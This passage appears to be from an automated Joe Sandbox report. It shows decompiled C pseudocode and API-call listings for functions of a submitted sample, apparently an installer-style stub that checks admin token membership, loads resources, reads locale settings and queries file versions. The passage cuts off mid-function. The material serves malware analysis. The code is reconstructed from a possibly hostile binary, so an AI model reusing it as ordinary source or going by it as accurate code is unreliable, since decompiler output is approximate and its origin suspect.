                                                                                                                                                                                                          • Part of subcall function 00E817EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E818DD), ref: 00E8181A
                                                                                                                                                                                                          • Part of subcall function 00E817EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E8182C
                                                                                                                                                                                                          • Part of subcall function 00E817EE: AllocateAndInitializeSid.ADVAPI32(00E818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E818DD), ref: 00E81855
                                                                                                                                                                                                          • Part of subcall function 00E817EE: FreeSid.ADVAPI32(?,?,?,?,00E818DD), ref: 00E81883
                                                                                                                                                                                                          • Part of subcall function 00E817EE: FreeLibrary.KERNEL32(00000000,?,?,?,00E818DD), ref: 00E8188A
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00E818EB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00E818F2
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00E8190A
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00E81918
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000000,?,?), ref: 00E8192C
                                                                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00E81944
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00E81964
                                                                                                                                                                                                        • EqualSid.ADVAPI32(00000004,?), ref: 00E8197A
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00E8199C
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00E819A3
                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00E819AD
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2168512254-0
                                                                                                                                                                                                        • Opcode ID: 97b649223325090162b8702584ece64e42c1be72707625413df19e15a7ba19eb
                                                                                                                                                                                                        • Instruction ID: d9fc43b6764c30d2759b8d24ca8b152733cb5b5b5e7672a7a1c491e4e89091b3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97b649223325090162b8702584ece64e42c1be72707625413df19e15a7ba19eb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8D313D71A00209EFEB20AFA6DC48AAFBBBCFB44704F141465E54DF2150DB34990ACB61
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00E8468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                        				long _t4;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				CHAR* _t14;
                                                                                                                                                                                                        				void* _t15;
                                                                                                                                                                                                        				long _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 = __ecx;
                                                                                                                                                                                                        				_t11 = __edx;
                                                                                                                                                                                                        				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                        				_t16 = _t4;
                                                                                                                                                                                                        				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                        					if(_t16 == 0) {
                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                        					FreeResource(_t15);
                                                                                                                                                                                                        					return _t16;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t4;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846A0
                                                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846A9
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E846C3
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846CC
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,00E82D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846D3
                                                                                                                                                                                                        • memcpy_s.MSVCRT ref: 00E846E5
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E846EF
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                        • String ID: TITLE$cent
                                                                                                                                                                                                        • API String ID: 3370778649-3553536280
                                                                                                                                                                                                        • Opcode ID: 2c748ccbeb8b087d3658caf5a6f43f2ddf227aa61442d67aa43341e27fc8bc53
                                                                                                                                                                                                        • Instruction ID: 55d98efbb0b279b8f1b05666a07c6cd24d27b3cadc2bb96f431665c3e5433f4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c748ccbeb8b087d3658caf5a6f43f2ddf227aa61442d67aa43341e27fc8bc53
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1601D6732402017FF32027A69C0CF6B3E2CDBC6B55F0C0025FA4DB6190D971884493A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E00E8681F(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v168;
                                                                                                                                                                                                        				void* _v172;
                                                                                                                                                                                                        				int* _v176;
                                                                                                                                                                                                        				int _v180;
                                                                                                                                                                                                        				int _v184;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t31;
                                                                                                                                                                                                        				signed int _t35;
                                                                                                                                                                                                        				void* _t36;
                                                                                                                                                                                                        				intOrPtr _t41;
                                                                                                                                                                                                        				signed int _t44;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t36 = __ebx;
                                                                                                                                                                                                        				_t19 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t19 ^ _t44;
                                                                                                                                                                                                        				_t41 =  *0xe881d8; // 0x0
                                                                                                                                                                                                        				_t43 = 0;
                                                                                                                                                                                                        				_v180 = 0xc;
                                                                                                                                                                                                        				_v176 = 0;
                                                                                                                                                                                                        				if(_t41 == 0xfffffffe) {
                                                                                                                                                                                                        					 *0xe881d8 = 0;
                                                                                                                                                                                                        					_v168.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        					if(GetVersionExA( &_v168) == 0) {
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        						_t41 =  *0xe881d8; // 0x0
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t41 = 1;
                                                                                                                                                                                                        						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                                                                                                                                                                        							goto L12;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t31 = RegQueryValueExA(_v172, 0xe81140, 0,  &_v184,  &_v20,  &_v180);
                                                                                                                                                                                                        							_t43 = _t31;
                                                                                                                                                                                                        							RegCloseKey(_v172);
                                                                                                                                                                                                        							if(_t31 != 0) {
                                                                                                                                                                                                        								goto L12;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t40 =  &_v176;
                                                                                                                                                                                                        								if(E00E866F9( &_v20,  &_v176) == 0) {
                                                                                                                                                                                                        									goto L12;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t35 = _v176 & 0x000003ff;
                                                                                                                                                                                                        									if(_t35 == 1 || _t35 == 0xd) {
                                                                                                                                                                                                        										 *0xe881d8 = _t41;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L12;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t18 =  &_v8; // 0xe8463b
                                                                                                                                                                                                        				return E00E86CE0(_t41, _t36,  *_t18 ^ _t44, _t40, _t41, _t43);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 00E8686E
                                                                                                                                                                                                        • GetSystemMetrics.USER32(0000004A), ref: 00E868A7
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 00E868CC
                                                                                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,00E81140,00000000,?,?,0000000C), ref: 00E868F4
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00E86902
                                                                                                                                                                                                          • Part of subcall function 00E866F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00E8691A), ref: 00E86741
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                                                                                                                                                                        • String ID: ;F$Control Panel\Desktop\ResourceLocale
                                                                                                                                                                                                        • API String ID: 3346862599-574545411
                                                                                                                                                                                                        • Opcode ID: 8204b3991a9db42ae99c3e3a51a207d2348b1737bea5973d2d303a6a8cdca3ba
                                                                                                                                                                                                        • Instruction ID: f75dd77dd476c104d7996800f26a7eaff2f996838a4f26e0b044a0cf9056ce74
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8204b3991a9db42ae99c3e3a51a207d2348b1737bea5973d2d303a6a8cdca3ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 99319331A01318DFDB31EB16CD45BAAB7B9EB85728F0411A5E94DB21A0DB309D89CF52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E83450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				void* _t11;
                                                                                                                                                                                                        				struct HWND__* _t12;
                                                                                                                                                                                                        				int _t22;
                                                                                                                                                                                                        				struct HWND__* _t24;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t7 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t7 == 0) {
                                                                                                                                                                                                        					EndDialog(_a4, 2);
                                                                                                                                                                                                        					L11:
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t11 = _t7 - 0x100;
                                                                                                                                                                                                        				if(_t11 == 0) {
                                                                                                                                                                                                        					_t12 = GetDesktopWindow();
                                                                                                                                                                                                        					_t24 = _a4;
                                                                                                                                                                                                        					E00E843D0(_t24, _t12);
                                                                                                                                                                                                        					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                        					SetDlgItemTextA(_t24, 0x838,  *0xe89404);
                                                                                                                                                                                                        					SetForegroundWindow(_t24);
                                                                                                                                                                                                        					goto L11;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t11 == 1) {
                                                                                                                                                                                                        					_t22 = _a12;
                                                                                                                                                                                                        					if(_t22 < 6) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 <= 7) {
                                                                                                                                                                                                        						L8:
                                                                                                                                                                                                        						EndDialog(_a4, _t22);
                                                                                                                                                                                                        						return 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(_t22 != 0x839) {
                                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xe891dc = 1;
                                                                                                                                                                                                        					goto L8;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • EndDialog.USER32(?,?), ref: 00E83490
                                                                                                                                                                                                        • GetDesktopWindow.USER32 ref: 00E8349A
                                                                                                                                                                                                        • SetWindowTextA.USER32(?,cent), ref: 00E834B2
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(?,00000838), ref: 00E834C4
                                                                                                                                                                                                        • SetForegroundWindow.USER32(?), ref: 00E834CB
                                                                                                                                                                                                        • EndDialog.USER32(?,00000002), ref: 00E834D8
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                        • String ID: cent
                                                                                                                                                                                                        • API String ID: 852535152-3940384054
                                                                                                                                                                                                        • Opcode ID: 91fd191cccf1a8842f3e7d0b2ef39caf8276fe12df2b739070af2cbc7426cd80
                                                                                                                                                                                                        • Instruction ID: 816cb525e7639fbbaef9cbf19c8d4555e81f2fb5ee973e3e65969e5e256bd295
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 91fd191cccf1a8842f3e7d0b2ef39caf8276fe12df2b739070af2cbc7426cd80
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0901DE31241114AFEB272F76DC0C9AD3A60EB05B11F045022F96EB29A0CA308F41CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E00E82AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t16;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				char _t32;
                                                                                                                                                                                                        				intOrPtr _t34;
                                                                                                                                                                                                        				char* _t38;
                                                                                                                                                                                                        				char _t42;
                                                                                                                                                                                                        				char* _t44;
                                                                                                                                                                                                        				CHAR* _t52;
                                                                                                                                                                                                        				intOrPtr* _t55;
                                                                                                                                                                                                        				CHAR* _t59;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				CHAR* _t64;
                                                                                                                                                                                                        				CHAR* _t65;
                                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t60 = __edx;
                                                                                                                                                                                                        				_t16 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                        				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                        				_t65 = _a4;
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t64 = __ecx;
                                                                                                                                                                                                        				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                        					GetModuleFileNameA( *0xe89a3c,  &_v268, 0x104);
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_t17 =  *_t64;
                                                                                                                                                                                                        						if(_t17 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                        						 *_t65 =  *_t64;
                                                                                                                                                                                                        						if(_t21 != 0) {
                                                                                                                                                                                                        							_t65[1] = _t64[1];
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if( *_t64 != 0x23) {
                                                                                                                                                                                                        							L19:
                                                                                                                                                                                                        							_t65 = CharNextA(_t65);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t64 = CharNextA(_t64);
                                                                                                                                                                                                        							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                        								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                        									if( *_t64 == 0x23) {
                                                                                                                                                                                                        										goto L19;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E00E81680(_t65, E00E817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        									_t52 = _t65;
                                                                                                                                                                                                        									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                        									_t60 = _t14;
                                                                                                                                                                                                        									do {
                                                                                                                                                                                                        										_t32 =  *_t52;
                                                                                                                                                                                                        										_t52 =  &(_t52[1]);
                                                                                                                                                                                                        									} while (_t32 != 0);
                                                                                                                                                                                                        									goto L17;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								E00E865E8( &_v268);
                                                                                                                                                                                                        								_t55 =  &_v268;
                                                                                                                                                                                                        								_t62 = _t55 + 1;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t34 =  *_t55;
                                                                                                                                                                                                        									_t55 = _t55 + 1;
                                                                                                                                                                                                        								} while (_t34 != 0);
                                                                                                                                                                                                        								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                        								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                        									 *_t38 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								E00E81680(_t65, E00E817C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                        								_t59 = _t65;
                                                                                                                                                                                                        								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                        								_t60 = _t12;
                                                                                                                                                                                                        								do {
                                                                                                                                                                                                        									_t42 =  *_t59;
                                                                                                                                                                                                        									_t59 =  &(_t59[1]);
                                                                                                                                                                                                        								} while (_t42 != 0);
                                                                                                                                                                                                        								L17:
                                                                                                                                                                                                        								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t64 = CharNextA(_t64);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *_t65 = _t17;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00E82AE6
                                                                                                                                                                                                        • IsDBCSLeadByte.KERNEL32(00000000), ref: 00E82AF2
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00E82B12
                                                                                                                                                                                                        • CharUpperA.USER32 ref: 00E82B1E
                                                                                                                                                                                                        • CharPrevA.USER32(?,?), ref: 00E82B55
                                                                                                                                                                                                        • CharNextA.USER32(?), ref: 00E82BD4
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 571164536-0
                                                                                                                                                                                                        • Opcode ID: 52c96eaa3f2bf9ed90a504ae39ad5b35849d3c10b95eaccc9f1d9e4b77f6a427
                                                                                                                                                                                                        • Instruction ID: 1ea758948aec939e1ee8f72595e5fa2d93bc61a457d3372e10d436e38e9098ad
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52c96eaa3f2bf9ed90a504ae39ad5b35849d3c10b95eaccc9f1d9e4b77f6a427
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 344103745052455FEB16AF348C54AFD7BA99F52304F1800EEE9CEB7202DB358E8A8B60
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E828E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				char* _v12;
                                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                                        				void* _v20;
                                                                                                                                                                                                        				intOrPtr _v24;
                                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                                        				char _v32;
                                                                                                                                                                                                        				void* _v36;
                                                                                                                                                                                                        				int _v40;
                                                                                                                                                                                                        				void* _v44;
                                                                                                                                                                                                        				intOrPtr _v48;
                                                                                                                                                                                                        				intOrPtr _v52;
                                                                                                                                                                                                        				intOrPtr _v56;
                                                                                                                                                                                                        				intOrPtr _v60;
                                                                                                                                                                                                        				intOrPtr _v64;
                                                                                                                                                                                                        				long _t68;
                                                                                                                                                                                                        				void* _t70;
                                                                                                                                                                                                        				void* _t73;
                                                                                                                                                                                                        				void* _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                                        				intOrPtr _t93;
                                                                                                                                                                                                        				intOrPtr _t97;
                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                        				int _t101;
                                                                                                                                                                                                        				void* _t103;
                                                                                                                                                                                                        				void* _t106;
                                                                                                                                                                                                        				void* _t109;
                                                                                                                                                                                                        				void* _t110;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                                                        				_t99 = __ecx;
                                                                                                                                                                                                        				_t106 = 0;
                                                                                                                                                                                                        				_v16 = __ecx;
                                                                                                                                                                                                        				_t87 = 0;
                                                                                                                                                                                                        				_t103 = 0;
                                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                                        				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                        					L19:
                                                                                                                                                                                                        					_t106 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t62 = 0;
                                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                                        					while(1) {
                                                                                                                                                                                                        						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                        						if(E00E82773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                        							goto L20;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t11 =  &_v32; // 0xe83938
                                                                                                                                                                                                        						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                        						_v28 = _t68;
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_t99 = _v16;
                                                                                                                                                                                                        							_t70 = _v8 + _t99;
                                                                                                                                                                                                        							_t93 = _v24;
                                                                                                                                                                                                        							_t87 = _v20;
                                                                                                                                                                                                        							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                        							if(_t103 != 0) {
                                                                                                                                                                                                        								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                        								_v36 = _t73;
                                                                                                                                                                                                        								if(_t73 != 0) {
                                                                                                                                                                                                        									_t16 =  &_v32; // 0xe83938
                                                                                                                                                                                                        									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                        										L15:
                                                                                                                                                                                                        										GlobalUnlock(_t103);
                                                                                                                                                                                                        										_t99 = _v16;
                                                                                                                                                                                                        										L18:
                                                                                                                                                                                                        										_t87 = _t87 + 1;
                                                                                                                                                                                                        										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                        										_v20 = _t87;
                                                                                                                                                                                                        										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                        										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L19;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t79 = _v44;
                                                                                                                                                                                                        										_t88 = _t106;
                                                                                                                                                                                                        										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                        										_t101 = _v28;
                                                                                                                                                                                                        										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                        										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                        										_t97 = _v48;
                                                                                                                                                                                                        										_v36 = _t83;
                                                                                                                                                                                                        										_t109 = _t83;
                                                                                                                                                                                                        										do {
